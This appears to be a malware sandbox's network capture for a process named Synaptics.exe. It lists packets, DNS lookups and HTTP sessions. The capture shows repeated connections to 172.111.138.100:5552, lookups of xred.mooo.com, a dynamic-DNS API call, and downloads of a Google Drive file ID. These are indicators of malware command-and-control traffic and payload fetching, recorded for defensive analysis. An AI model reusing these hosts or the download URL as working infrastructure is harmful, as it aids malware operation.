                                                                                                                    Dec 30, 2024 11:26:12.706803083 CET49957443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:12.706803083 CET49957443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:13.090818882 CET44349959142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:13.090886116 CET49959443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:13.091665030 CET44349959142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:13.091721058 CET49959443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:13.197757959 CET44349960142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:13.197820902 CET49960443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:13.926781893 CET555249947172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:13.928069115 CET499475552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:13.975409031 CET499475552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:13.980350971 CET555249947172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:18.630176067 CET499615552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:18.635097027 CET555249961172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:18.635178089 CET499615552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:18.635901928 CET499615552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:18.640717983 CET555249961172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:20.785867929 CET555249961172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:20.785937071 CET499615552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:20.841741085 CET499615552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:20.846631050 CET555249961172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:27.676990986 CET499635552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:27.681893110 CET555249963172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:27.681957006 CET499635552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:27.682320118 CET499635552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:27.687104940 CET555249963172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:31.299609900 CET49958443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:31.299609900 CET49958443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:31.299634933 CET44349958142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:31.299931049 CET49958443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:31.302309990 CET49960443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:31.302341938 CET44349960142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:31.305059910 CET49960443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:31.305072069 CET44349960142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:31.306258917 CET49966443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:31.306304932 CET44349966142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:31.306365967 CET49966443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:31.316359043 CET49957443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:31.316387892 CET44349957142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:31.631699085 CET44349960142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:31.631759882 CET44349960142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:31.631797075 CET49960443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:31.631828070 CET44349960142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:31.631841898 CET49960443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:31.631891012 CET44349960142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:31.631932020 CET49960443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:32.068521023 CET555249963172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:32.068587065 CET499635552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:32.142972946 CET499635552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:32.147870064 CET555249963172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:37.033035994 CET499695552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:37.038017988 CET555249969172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:37.038142920 CET499695552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:37.051770926 CET499695552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:37.056541920 CET555249969172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:39.149342060 CET555249969172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:39.149406910 CET499695552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:39.166755915 CET499695552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:39.173573017 CET555249969172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:46.083147049 CET499705552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:46.088042021 CET555249970172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:46.088119984 CET499705552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:46.088464975 CET499705552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:46.093281984 CET555249970172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:48.266783953 CET555249970172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:48.266836882 CET499705552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:48.324845076 CET499705552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:48.329720974 CET555249970172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:54.961720943 CET49966443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:54.961749077 CET44349966142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:54.962600946 CET49972443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:54.962654114 CET44349972142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:54.962754965 CET49972443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:54.966392040 CET49959443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:54.966419935 CET44349959142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:54.966809988 CET44349959142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:54.967617989 CET49972443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:54.967633009 CET44349972142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:54.967654943 CET49959443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:55.560889959 CET44349966142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:55.560970068 CET49966443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:55.561719894 CET44349966142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:55.561769962 CET49966443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:55.566070080 CET44349972142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:55.566138029 CET49972443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:55.567292929 CET499735552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:55.572163105 CET555249973172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:55.572504997 CET499735552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:55.572882891 CET499735552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:55.577678919 CET555249973172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:57.701047897 CET555249973172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:57.701112032 CET499735552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:57.748876095 CET499735552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:26:57.753591061 CET555249973172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:04.630191088 CET499745552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:04.635037899 CET555249974172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:04.635128021 CET499745552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:04.635469913 CET499745552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:04.640290976 CET555249974172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:06.808847904 CET555249974172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:06.812279940 CET499745552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:07.882466078 CET499745552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:07.887404919 CET555249974172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:14.044091940 CET499755552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:14.049053907 CET555249975172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:14.049134016 CET499755552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:14.049428940 CET499755552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:14.054168940 CET555249975172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:30.174057007 CET555249975172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:30.174125910 CET499755552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:30.182900906 CET499755552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:30.187772036 CET555249975172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:30.208709955 CET499785552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:30.213586092 CET555249978172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:30.213727951 CET499785552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:30.214087963 CET499785552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:30.218806028 CET555249978172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:44.084431887 CET555249978172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:44.084629059 CET499785552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:44.141242027 CET499785552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:44.147102118 CET555249978172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:44.161832094 CET499795552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:44.166757107 CET555249979172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:44.166850090 CET499795552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:44.167160034 CET499795552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:44.171968937 CET555249979172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:46.337516069 CET555249979172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:46.337620020 CET499795552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:46.356514931 CET499795552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:46.361574888 CET555249979172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:53.224034071 CET499805552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:53.229036093 CET555249980172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:53.229263067 CET499805552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:53.229379892 CET499805552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:53.234188080 CET555249980172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:53.498584032 CET4971780192.168.2.969.42.215.252
                                                                                                                    Dec 30, 2024 11:27:53.533016920 CET49960443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:27:53.533610106 CET49959443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:27:53.533734083 CET49966443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:27:53.533813000 CET49972443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:27:55.369499922 CET555249980172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:55.369551897 CET499805552192.168.2.9172.111.138.100

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 30, 2024 11:25:22.997725964 CET4969553192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:23.004785061 CET53496951.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:24.780280113 CET6495253192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:24.787516117 CET53649521.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:24.815880060 CET5893953192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:24.824109077 CET53589391.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:25.108273983 CET6150153192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:25.115520000 CET53615011.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:31.620666027 CET5579753192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:31.627922058 CET53557971.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:36.459898949 CET5333953192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:36.467302084 CET53533391.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:42.443902016 CET6335153192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:42.451451063 CET53633511.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:47.127808094 CET6184053192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:47.135489941 CET53618401.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:52.965065956 CET6114253192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:52.972135067 CET53611421.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:59.928705931 CET6011053192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:59.936491013 CET53601101.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:06.974661112 CET5002453192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:26:06.982017994 CET53500241.1.1.1192.168.2.9

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Dec 30, 2024 11:25:22.997725964 CET192.168.2.91.1.1.10x55adStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:24.780280113 CET192.168.2.91.1.1.10xe53dStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:24.815880060 CET192.168.2.91.1.1.10x18a2Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:25.108273983 CET192.168.2.91.1.1.10x1d03Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:31.620666027 CET192.168.2.91.1.1.10x9009Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:36.459898949 CET192.168.2.91.1.1.10x6966Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:42.443902016 CET192.168.2.91.1.1.10x5346Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:47.127808094 CET192.168.2.91.1.1.10x3ad0Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:52.965065956 CET192.168.2.91.1.1.10xebc8Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:59.928705931 CET192.168.2.91.1.1.10x50bcStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:26:06.974661112 CET192.168.2.91.1.1.10x1a7eStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Dec 30, 2024 11:25:23.004785061 CET1.1.1.1192.168.2.90x55adNo error (0)docs.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:24.787516117 CET1.1.1.1192.168.2.90xe53dName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:24.824109077 CET1.1.1.1192.168.2.90x18a2No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:25.115520000 CET1.1.1.1192.168.2.90x1d03No error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:31.627922058 CET1.1.1.1192.168.2.90x9009Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:36.467302084 CET1.1.1.1192.168.2.90x6966Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:42.451451063 CET1.1.1.1192.168.2.90x5346Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:47.135489941 CET1.1.1.1192.168.2.90x3ad0Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:52.972135067 CET1.1.1.1192.168.2.90xebc8Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:25:59.936491013 CET1.1.1.1192.168.2.90x50bcName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:26:06.982017994 CET1.1.1.1192.168.2.90x1a7eName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:26:24.603271961 CET1.1.1.1192.168.2.90x4b6aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:26:24.603271961 CET1.1.1.1192.168.2.90x4b6aNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 30, 2024 11:26:24.603271961 CET1.1.1.1192.168.2.90x4b6aNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • docs.google.com
                                                                                                                    • drive.usercontent.google.com
                                                                                                                    • freedns.afraid.org

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.94971769.42.215.252807464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 30, 2024 11:25:24.830220938 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                    User-Agent: MyApp
                                                                                                                    Host: freedns.afraid.org
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Dec 30, 2024 11:25:25.431468964 CET243INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:25 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    X-Cache: MISS
                                                                                                                    Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                    HTTPS Proxied Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.949713142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:24 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:24 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-WKosOfo0e41_6oaxs0jVBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.949712142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:24 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:24 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-XimWgbbBkx2Zx4HNiD_tMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.949719142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:25 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-aZa8YgIuvbJ6DJzq69TQFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.949718142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:25 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
